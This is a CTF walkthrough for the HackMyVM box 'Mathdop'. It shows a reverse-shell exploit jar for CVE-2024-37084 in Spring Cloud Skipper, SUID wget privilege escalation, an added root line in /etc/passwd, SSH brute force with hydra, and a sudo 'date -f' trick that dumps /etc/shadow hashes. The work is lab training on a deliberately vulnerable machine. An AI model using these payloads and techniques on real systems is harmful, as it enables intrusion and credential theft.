HackMyVM-Mathdop-Walkthrough
城南花已开 Lv6

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.153 08:00:27:63:c3:6c PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e0:e5:17 VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.077 seconds (123.25 hosts/sec). 4 responded
export ip=192.168.60.153
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Breaking and entering... into the world of open ports.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.153:22
Open 192.168.60.153:7577
Open 192.168.60.153:9393
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-23 21:03 CST
Initiating ARP Ping Scan at 21:03
Scanning 192.168.60.153 [1 port]
Completed ARP Ping Scan at 21:03, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:03
Completed Parallel DNS resolution of 1 host. at 21:03, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:03
Scanning 192.168.60.153 [3 ports]
Discovered open port 22/tcp on 192.168.60.153
Discovered open port 7577/tcp on 192.168.60.153
Discovered open port 9393/tcp on 192.168.60.153
Completed SYN Stealth Scan at 21:03, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.153
Host is up, received arp-response (0.00060s latency).
Scanned at 2025-04-23 21:03:34 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
7577/tcp open unknown syn-ack ttl 63
9393/tcp open unknown syn-ack ttl 63
MAC Address: 08:00:27:63:C3:6C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

No common ports are open.

Trying an nc connection reveals a web service (the reply is an HTTP 400):

❯ nc -v $ip 7577
192.168.60.153: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.60.153] 7577 (?) open
ls
HTTP/1.1 400
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 435
Date: Wed, 23 Apr 2025 13:04:37 GMT
Connection: close

<!doctype html><html lang="en"><head><title>HTTP Status 400 – Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 – Bad Request</h1></body></html>%

PoC Exploitation

Some searching shows that these two ports usually appear together:

Port | Component              | Role
7577 | Spring Cloud Skipper   | Manages deploying, upgrading and rolling back Spring Boot apps (especially Stream apps)
9393 | Spring Cloud Data Flow | Provides the UI and API for creating and managing streaming data pipelines (streams) and batch tasks (tasks)

Port 7577 returns JSON data.

/api/about reveals that the Spring Cloud Skipper server version is 2.11.3-SNAPSHOT, a snapshot build at that:

❯ curl http://192.168.60.153:7577/api/about
{
"versionInfo" : {
"server" : {
"name" : "Spring Cloud Skipper Server",
"version" : "2.11.3-SNAPSHOT"
},
"shell" : {
"name" : "Spring Cloud Skipper Shell",
"version" : "2.11.3-SNAPSHOT",
"url" : "https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-skipper-shell/2.11.3-SNAPSHOT/spring-cloud-skipper-shell-2.11.3-SNAPSHOT.jar"
}
}
}

Searching online shows that this version has a remote code execution (RCE) vulnerability, and that a PoC has been published for it:

image

CVE-2024-37084: Spring Cloud Remote Code Execution | Research

Kayiyan/CVE-2024-37084-Poc: Analysis , Demo exploit and poc about CVE-2024-37084

Ly4j/CVE-2024-37084-Exp: Spring Cloud Data Flow CVE-2024-37084 exp

Exploitation first requires building a malicious jar.

Following the README, edit the base64 string in src\artsploit\AwesomeScriptEngineFactory.java:

Replace the base64 passed to Runtime.getRuntime().exec with the base64 of the command you want to run:

public AwesomeScriptEngineFactory() {
    try {
        //If you want to rebound the shell: Base64 encoding is required.: bash -i >& /dev/tcp/192.168.67.147/4444 0>&1
        //then Runtime.getRuntime().exec("bash -c {echo,Base64 encoding}|{base64,-d}|{bash,-i}")
        Runtime.getRuntime().exec("bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNjAuMTAwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}");
    } catch (IOException e) {
        e.printStackTrace();
    }
}

Compile the malicious jar with javac and jar:

❯ javac -source 8 -target 8 src/artsploit/AwesomeScriptEngineFactory.java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
warning: [options] bootstrap class path not set in conjunction with -source 8
warning: [options] source value 8 is obsolete and will be removed in a future release
warning: [options] target value 8 is obsolete and will be removed in a future release
warning: [options] To suppress warnings about obsolete options, use -Xlint:-options.
Note: src/artsploit/AwesomeScriptEngineFactory.java uses or overrides a deprecated API.
Note: Recompile with -Xlint:deprecation for details.
4 warnings
❯ jar -cvf rev.jar -C src/ .
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
added manifest
ignoring entry META-INF/
adding: META-INF/services/(in = 0) (out= 0)(stored 0%)
adding: META-INF/services/javax.script.ScriptEngineFactory(in = 36) (out= 38)(deflated -5%)
adding: artsploit/(in = 0) (out= 0)(stored 0%)
adding: artsploit/AwesomeScriptEngineFactory.class(in = 1692) (out= 757)(deflated 55%)
adding: artsploit/AwesomeScriptEngineFactory.java(in = 1790) (out= 569)(deflated 68%)

Start a simple HTTP server with Python so the target fetches and loads the rev.jar package:

❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.153 - - [23/Apr/2025 21:47:02] "GET /yaml-payload.jar HTTP/1.1" 200 -
192.168.60.153 - - [23/Apr/2025 21:47:02] "GET /yaml-payload.jar HTTP/1.1" 200 -
-------------------------------------------
❯ python3 cve-2024-37084-exp.py -u http://192.168.60.153:7577 -payload http://192.168.60.100:8000/yaml-payload.jar

User Privilege Escalation

With a listener running at the same time, this gives a shell as the user running Spring Cloud Skipper.

Checking the IP shows that this environment is a Docker container:

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from 921567b128b2-192.168.60.153-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one basic session to handle the PTY
[+] Attempting to spawn a reverse shell on 192.168.60.100:4444
[+] Got reverse shell from 921567b128b2-192.168.60.153-Linux-x86_64 😍️ Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/921567b128b2~192.168.60.153_Linux_x86_64/2025_04_23-21_47_03-067.log 📜
─────────────────────────────────────────────────────────────────────
cnb@921567b128b2:/workspace$ hostname -I
172.17.0.3

There is also a note with a hint in the home directory.

It gives the username mathlake and suggests the password may be sha256(T+S+C) or sha256(T*S*C):

cnb@921567b128b2:~$ id
uid=1000(cnb) gid=1000(cnb) groups=1000(cnb)
cnb@921567b128b2:~$ cat note
Hi mathlake
Long time no see, 256 is my favorite number. I know you are very interested in mathematics, but I have been struggling with a math problem recently. The method used is time series decomposition. I have sent you the data, and you can provide me with the mathematical expressions for T, S, and C (rounded to the nearest integer) corresponding to the month.
June 2025

The Docker environment is fairly bare and lacks many tools.

I uploaded ligolo to try to set up a TUN tunnel:

cnb@921567b128b2:~$ cd /tmp/
cnb@921567b128b2:/tmp$
[!] Session detached ⇲
(Penelope)─(Session [1])> upload ../../toolkit/
[+] Upload OK /tmp/toolkit-FefEEtdP
(Penelope)─(Session [1])> interact
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/921567b128b2~192.168.60.153_Linux_x86_64/2025_04_23-21_47_03-067.log 📜
cnb@921567b128b2:/tmp/toolkit-FefEEtdP$ ls
busybox chisel fscan ligolo_agent linpeas.sh pspy64 socat stowaway_agent
cnb@921567b128b2:/tmp/toolkit-FefEEtdP$ ./ligolo_agent -connect 192.168.60.100:11601 --ignore-cert &
[1] 1576
cnb@921567b128b2:/tmp/toolkit-FefEEtdP$ WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="192.168.60.100:11601"
---------------------------------------
sudo ./proxy -selfcert
[sudo] password for Pepster:
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.7.5

ligolo-ng » interface_create --name docker
INFO[0003] Creating a new "docker" interface...
INFO[0003] Interface created!
ligolo-ng » INFO[0007] Agent joined. id=4bcb395a-e41f-4cd8-96ff-f49476ae83f7 name=cnb@921567b128b2 remote="192.168.60.153:57112"
ligolo-ng » session
? Specify a session : 1 - cnb@921567b128b2 - 192.168.60.153:57112 - 4bcb395a-e41f-4cd8-96ff-f49476ae83f7
[Agent : cnb@921567b128b2] » tunnel_start --tun docker
[Agent : cnb@921567b128b2] » INFO[0058] Starting tunnel to cnb@921567b128b2 (4bcb395a-e41f-4cd8-96ff-f49476ae83f7)
-----------------------------------------
sudo ip route add 172.17.0.0/24 dev docker
[sudo] password for Pepster:

I ran linpeas inside the container.

It shows that wget has the SUID and SGID bits set:

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x. 1 root shadow 34K Feb 2 2023 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x. 1 root shadow 34K Feb 2 2023 /sbin/unix_chkpwd
-rwxr-sr-x. 1 root shadow 71K Nov 29 2022 /usr/bin/chage
-rwxr-sr-x. 1 root shadow 23K Nov 29 2022 /usr/bin/expiry
-rwxr-sr-x. 1 root tty 31K Sep 16 2020 /usr/bin/wall
-rwsr-sr-x. 1 root root 488K Feb 5 2018 /usr/local/bin/wget

This escalates directly to root inside the container:

cnb@921567b128b2:/tmp$ echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' > exp
cnb@921567b128b2:/tmp$ chmod +x exp
cnb@921567b128b2:/tmp$ /usr/local/bin/wget --use-askpass=/tmp/exp 0
# whoami
root
# echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash' >>/etc/passwd
# exit
Error reading response from command "/tmp/exp Username for 'http://0': ": Success
cnb@921567b128b2:/tmp$ su primary
Password:
root@921567b128b2:/tmp#

This doesn't seem to be much use; even as root, the data mentioned in the note isn't there.

I ran a full-port fscan against each host.

There are two containers, which map ports 9393 and 7577 respectively to the host:

root@921567b128b2:/tmp/toolkit-FefEEtdP# ./fscan -h 172.17.0.2 -p 0-65535

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 0-65535
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[!] 忽略无效端口: 0
[*] 共解析 65535 个有效端口
[+] 端口开放 172.17.0.2:9393
[+] 端口开放 172.17.0.2:19092
[+] 存活端口数量: 2
[*] 网站标题 http://172.17.0.2:9393 状态码:200 长度:6378 标题:无标题
[+] 扫描已完成: 2/2
[*] 扫描结束,耗时: 10.554258253s
root@921567b128b2:/tmp/toolkit-FefEEtdP# ./fscan -h 172.17.0.3 -p 0-65535
[*] 扫描类型: all, 目标端口: 0-65535
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[!] 忽略无效端口: 0
[*] 共解析 65535 个有效端口
[+] 端口开放 172.17.0.3:7577
[+] 存活端口数量: 1
[*] 开始漏洞扫描...
[*] 网站标题 http://172.17.0.3:7577 状态码:302 长度:0 标题:无标题 重定向地址: http://172.17.0.3:7577/api
[*] 网站标题 http://172.17.0.3:7577/api 状态码:200 长度:848 标题:无标题
[+] 扫描已完成: 1/1
[*] 扫描结束,耗时: 7.623899s

image

The 172.17.0.3 container serves port 7577, the Spring Cloud Skipper service.

However, the 172.17.0.2 container needs to reach the Skipper Server at runtime, and its configuration points at localhost rather than the .3 container, so the connection is reset.

image


Mathematical Modelling

Stuck here.

One thing: I couldn't find the data file at all; a glance at a writeup revealed it is in /var/mail/mathlake:

root@921567b128b2:~# ls -al /var/mail/mathlake/
total 28
drwx--S---. 2 root mail 55 Mar 12 01:47 .
drwxrwsr-x. 1 root mail 22 Mar 12 01:41 ..
-rw-r--r--. 1 root mail 10299 Mar 7 08:14 data.xlsx
-rw-r--r--. 1 root mail 3906 Mar 11 23:56 test.png
-rw-r--r--. 1 root mail 8815 Mar 11 23:58 true.png

linpeas.sh actually finds it too; I was careless and didn't notice:

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)
19381532 12 -rw-r--r-- 1 root mail 10299 Mar 7 08:14 /var/mail/mathlake/data.xlsx
19381533 4 -rw-r--r-- 1 root mail 3906 Mar 11 23:56 /var/mail/mathlake/test.png
19381534 12 -rw-r--r-- 1 root mail 8815 Mar 11 23:58 /var/mail/mathlake/true.png
19381532 12 -rw-r--r-- 1 root mail 10299 Mar 7 08:14 /var/spool/mail/mathlake/data.xlsx
19381533 4 -rw-r--r-- 1 root mail 3906 Mar 11 23:56 /var/spool/mail/mathlake/test.png
19381534 12 -rw-r--r-- 1 root mail 8815 Mar 11 23:58 /var/spool/mail/mathlake/true.png

Download them locally:

(Penelope)─(Session [4])> download data.xlsx
[+] Download OK '/home/Pepster/.penelope/921567b128b2~192.168.60.153_Linux_x86_64/downloads/home/cnb/data.xlsx'
(Penelope)─(Session [4])> download test.png
[+] Download OK '/home/Pepster/.penelope/921567b128b2~192.168.60.153_Linux_x86_64/downloads/home/cnb/test.png'
(Penelope)─(Session [4])> download true.png
[+] Download OK '/home/Pepster/.penelope/921567b128b2~192.168.60.153_Linux_x86_64/downloads/home/cnb/true.png'
(Penelope)─(Session [4])>

image

image

image

What follows is a mathematical modelling problem, which I handed straight to GPT.

Write a script that computes sha256 over this range,

and save the results to pass.txt:

cat a.sh
for i in {56..59}
do
  for j in {0..3}
  do
    for n in {0..3}
    do
      # sha256 of "T*S*C" (the product form from the note); echo appends a newline, which is part of the hashed string
      echo "$i*$j*$n"|sha256sum|awk '{print $1}'
    done
  done
done
❯ bash a.sh>pass.txt

Brute-force the credentials of user mathlake with hydra:

❯ hydra -l mathlake -P pass.txt ssh://$ip -I -e ns
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-24 22:20:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries (l:1/p:66), ~5 tries per task
[DATA] attacking ssh://192.168.60.153:22/
[22][ssh] host: 192.168.60.153 login: mathlake password: 9bd29d2c90998b5af05b3fdf10d9ab4c9eff53f2a827fbc39247200874ab6ca3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-24 22:20:21

The password is 9bd29d2c90998b5af05b3fdf10d9ab4c9eff53f2a827fbc39247200874ab6ca3.

Root Privilege Escalation

Log in with SSH:

❯ ssh mathlake@$ip
mathlake@192.168.60.153's password:
Last failed login: Thu Apr 24 22:20:17 CST 2025 from 192.168.60.100 on ssh:notty
There were 97 failed login attempts since the last successful login.
Last login: Sun Mar 30 18:43:26 2025
[mathlake@mathdop ~]$ cat user.txt
flag{d79b3daf297f1ad136284d93900c0fe8543a52eb}

This user also has a sudo entry; the environment is tightly restricted, keeping only the language, locale and display related variables:

[mathlake@mathdop ~]$ sudo -l
Matching Defaults entries for mathlake on mathdop:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User mathlake may run the following commands on mathdop:
(ALL) NOPASSWD: /opt/secure_input_handler.sh

Look at the script:

[mathlake@mathdop ~]$ cat /opt/secure_input_handler.sh
#!/bin/bash
export PATH="/usr/bin"

read -p "Input Command: " user_input

decoded_input=$(echo -n "$user_input" | base64 -d 2>/dev/null | tr -d '\r\0\a' | col -b)
if [[ ${#user_input} -gt 128 || -z "$decoded_input" ]]; then
    echo "[!] Decoding failed or input is too long" >&2
    exit 2
fi

filtered_input=$(echo "$decoded_input" | tr -cd 'a-zA-Z0-9\-_/ :.' | sed -e 's/[[:space:]]\+/ /g' -e 's/^[ \t]*//' -e 's/[ \t]*$//')

IFS=' ' read -ra cmd_args <<< "$filtered_input"
command="${cmd_args[0]}"
command_clean=$(echo "$command" | tr -d -c 'a-zA-Z0-9')

allowed_commands=("date" "pwd" "echo")
if ! printf "%s\n" "${allowed_commands[@]}" | grep -qxF "$command_clean"; then
    echo "[!] Illegal instruction: $command_clean" >&2
    exit 3
fi

/usr/bin/timeout 2 /usr/bin/bash -c "${filtered_input}"

In short, the input is base64-decoded and then filtered, with whitespace such as spaces and tabs normalised.

The filtering in detail:

  1. Base64-decode the input.
  2. Remove the control characters \r, \0 and \a.
  3. Use col -b to clean backspaces and other invisible characters, preventing terminal escape tricks.
  4. Keep only letters, digits, the characters -_/:. and spaces.
  5. Collapse consecutive spaces and trim leading and trailing whitespace, preventing argument injection.
  6. Split the filtered input on spaces into a command and its arguments.
  7. Extract the command part (the first word).
  8. Clean the command name a second time, keeping only alphanumerics (for example, e.c-ho becomes echo).
  9. Check that the cleaned command name is in the allow-list; refuse to run it otherwise.
  10. Use timeout 2 to limit the command to at most 2 seconds of run time.
  11. Run the command through the absolute path /usr/bin/bash, avoiding shell alias or function hijacking.

Only date, pwd and echo are allowed.

However, date has a -f option that echoes file contents back in its error messages, which gives arbitrary file read:

[mathlake@mathdop ~]$ date --help
Usage: date [OPTION]... [+FORMAT]
or: date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]
Display the current time in the given FORMAT, or set the system date.

Mandatory arguments to long options are mandatory for short options too.
-d, --date=STRING display time described by STRING, not 'now'
-f, --file=DATEFILE like --date once for each line of DATEFILE
-I[TIMESPEC], --iso-8601[=TIMESPEC] output date/time in ISO 8601 format.
TIMESPEC='date' for date only (the default),
'hours', 'minutes', 'seconds', or 'ns' for date
and time to the indicated precision.
-r, --reference=FILE display the last modification time of FILE
-R, --rfc-2822 output date and time in RFC 2822 format.
Example: Mon, 07 Aug 2006 12:34:56 -0600
--rfc-3339=TIMESPEC output date and time in RFC 3339 format.
TIMESPEC='date', 'seconds', or 'ns' for
date and time to the indicated precision.
Date and time components are separated by
a single space: 2006-08-07 12:34:56-06:00
-s, --set=STRING set time described by STRING
-u, --utc, --universal print or set Coordinated Universal Time (UTC)
--help display this help and exit
--version output version information and exit
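The root cause of the file read above is that the handler validates only the first word and never looks at the arguments. The added example below (not the box's own script) models the original allow-list check next to a stricter policy that also inspects the arguments; all inputs are constructed, nothing is executed, and col -b from the original pipeline is left out.

```shell
#!/bin/sh
# Added example, not the box's own script: a model of the allow-list check in
# /opt/secure_input_handler.sh beside a stricter policy that also inspects the
# arguments. Inputs are constructed base64 strings; the functions only return
# "allow" or "deny" and never run anything.

# Mirror of the original sanitising pipeline: base64-decode, drop \r \0 \a,
# keep only [a-zA-Z0-9_/ :.-], collapse runs of spaces and trim both ends.
filter_input() {
  printf '%s' "$1" | base64 -d 2>/dev/null | tr -d '\r\0\a' \
    | tr -cd 'a-zA-Z0-9_/ :.-' | tr -s ' ' | sed -e 's/^ *//' -e 's/ *$//'
}

# Original policy: only the first word, reduced to alphanumerics, is compared
# with the allow-list. The arguments are never examined, so "date -f FILE"
# passes even though date then prints every line of FILE in an error message.
original_policy() {
  set -- $(filter_input "$1")
  cmd=$(printf '%s' "${1:-}" | tr -d -c 'a-zA-Z0-9')
  case "$cmd" in
    date|pwd|echo) echo allow ;;
    *) echo deny ;;
  esac
}

# Stricter policy: the first word must match the allow-list exactly, and every
# argument is rejected if it looks like an option (-...) or a path (contains /).
hardened_policy() {
  set -- $(filter_input "$1")
  case "${1:-}" in
    date|pwd|echo) ;;
    *) echo deny; return 0 ;;
  esac
  shift
  for arg in "$@"; do
    case "$arg" in
      -*|*/*) echo deny; return 0 ;;
    esac
  done
  echo allow
}

# Demo on the page's own base64 for "date -f /etc/shadow" and a harmless echo.
for b64 in "ZGF0ZSAtZiAvZXRjL3NoYWRvdwo=" "$(printf 'echo hello' | base64)"; do
  printf '%-36s original=%s hardened=%s\n' "$b64" \
    "$(original_policy "$b64")" "$(hardened_policy "$b64")"
done
```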

I tried to read the private key file, but it doesn't exist.

The usual root.txt doesn't exist either:

[mathlake@mathdop ~]$ echo "date -f /root/.ssh/id_rsa"|base64
ZGF0ZSAtZiAvcm9vdC8uc3NoL2lkX3JzYQo=
[mathlake@mathdop ~]$ sudo /opt/secure_input_handler.sh
Input Command: ZGF0ZSAtZiAvcm9vdC8uc3NoL2lkX3JzYQo=
date: ‘/root/.ssh/id_rsa’: No such file or directory
[mathlake@mathdop ~]$ echo "date -f /root/root.txt"|base64
ZGF0ZSAtZiAvcm9vdC9yb290LnR4dAo=
[mathlake@mathdop ~]$ sudo /opt/secure_input_handler.sh
Input Command: ZGF0ZSAtZiAvcm9vdC9yb290LnR4dAo=
date: ‘/root/root.txt’: No such file or directory

/etc/shadow can still be read normally, though.

There are two unusual lines at the top:

# Worth waiting for #9e9feaf74138c66fbaadba5a9da259c5

[mathlake@mathdop ~]$ echo "date -f /etc/shadow"|base64
ZGF0ZSAtZiAvZXRjL3NoYWRvdwo=
[mathlake@mathdop ~]$ sudo /opt/secure_input_handler.sh
Input Command: ZGF0ZSAtZiAvZXRjL3NoYWRvdwo=
date: invalid date ‘# Worth waiting for
date: invalid date ‘# 9e9feaf74138c66fbaadba5a9da259c5’
date: invalid date ‘root:$6$WUx.0Qf6$/oYqJocLrdpGZJup8oAxMoxjJnZ3huUNKno6TObA/fcbax0yhptGiAP2pNcjJfsCQ0o5H2RgpyP6R/CiZh33m.:20177:0:99999:7:::’
date: invalid date ‘bin:*:18353:0:99999:7:::’
date: invalid date ‘daemon:*:18353:0:99999:7:::’
date: invalid date ‘adm:*:18353:0:99999:7:::’
date: invalid date ‘lp:*:18353:0:99999:7:::’
date: invalid date ‘sync:*:18353:0:99999:7:::’
date: invalid date ‘shutdown:*:18353:0:99999:7:::’
date: invalid date ‘halt:*:18353:0:99999:7:::’
date: invalid date ‘mail:*:18353:0:99999:7:::’
date: invalid date ‘operator:*:18353:0:99999:7:::’
date: invalid date ‘games:*:18353:0:99999:7:::’
date: invalid date ‘ftp:*:18353:0:99999:7:::’
date: invalid date ‘nobody:*:18353:0:99999:7:::’
date: invalid date ‘systemd-network:!!:20157::::::’
date: invalid date ‘dbus:!!:20157::::::’
date: invalid date ‘polkitd:!!:20157::::::’
date: invalid date ‘sshd:!!:20157::::::’
date: invalid date ‘postfix:!!:20157::::::’
date: invalid date ‘mathlake:$6$XdfsxCCu$sHnJOhJpbvkbW/aLnCE/4QyYVYW0j2DNSByRxiJ2pLuFJkXi8Yk.wD33.SEUxtTuZ3z1xYqchgilvmX2yzZsq.:20177:0:99999:7:::’

Try it as the root password.

The first one is the correct root password:

[mathlake@mathdop ~]$ su root
Password:
[root@mathdop mathlake]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@mathdop mathlake]# cd /root
[root@mathdop ~]# ls
anaconda-ks.cfg r00000000000000000000000000000000000000000000000000000t.txt
[root@mathdop ~]# cat r00000000000000000000000000000000000000000000000000000t.txt
flag{29975f78aafc266eaa88520357552917d1164964}

Although the author rated this box easy, the maths part was pretty hard for me 😅
